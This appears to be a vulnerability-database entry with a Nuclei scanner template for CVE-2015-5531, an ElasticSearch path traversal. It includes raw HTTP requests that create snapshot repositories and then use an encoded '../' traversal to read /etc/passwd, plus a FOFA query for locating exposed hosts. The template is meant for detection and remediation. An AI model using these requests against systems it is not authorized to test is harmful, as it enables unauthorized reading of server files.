ElasticSearch <1.6.1 - Local File Inclusion

2022-01-0411:21:00

ProjectDiscovery

github.com

cve2015

vulhub

packetstorm

elasticsearch

local file inclusion

snapshot api

remote attackers

unauthorized access

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

6.2

Confidence

Low

EPSS

0.97

Percentile

99.8%

JSON

ElasticSearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls.

id: CVE-2015-5531

info:
  name: ElasticSearch <1.6.1 - Local File Inclusion
  author: princechaddha
  severity: medium
  description: ElasticSearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure.
  remediation: |
    Upgrade ElasticSearch to version 1.6.1 or later to mitigate the vulnerability.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-5531
    - https://nvd.nist.gov/vuln/detail/CVE-2015-5531
    - http://packetstormsecurity.com/files/132721/Elasticsearch-Directory-Traversal.html
    - https://www.elastic.co/community/security/
    - http://packetstormsecurity.com/files/133797/ElasticSearch-Path-Traversal-Arbitrary-File-Download.html
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2015-5531
    cwe-id: CWE-22
    epss-score: 0.97144
    epss-percentile: 0.99802
    cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: elasticsearch
    product: elasticsearch
    fofa-query: index_not_found_exception
  tags: cve2015,cve,vulhub,packetstorm,elasticsearch,intrusive

http:
  - raw:
      - |
        PUT /_snapshot/test HTTP/1.1
        Host: {{Hostname}}

        {
            "type": "fs",
            "settings": {
                "location": "/usr/share/elasticsearch/repo/test"
            }
        }
      - |
        PUT /_snapshot/test2 HTTP/1.1
        Host: {{Hostname}}

        {
            "type": "fs",
            "settings": {
                "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata"
            }
        }
      - |
        GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd  HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - ElasticsearchParseException
          - Failed to derive xcontent from
          - 114, 111, 111, 116, 58
        condition: and

      - type: status
        status:
          - 400
# digest: 4a0a00473045022100c3a9f2d041f2e75dd77d111180e573fa77581d495321d5b602b710375e9bab5802204832764c446a039e3d1b93621dab1eb423fe570fc6c226804f3c05bd6bd7b558:922c64590222798bb761d5b6d8e72950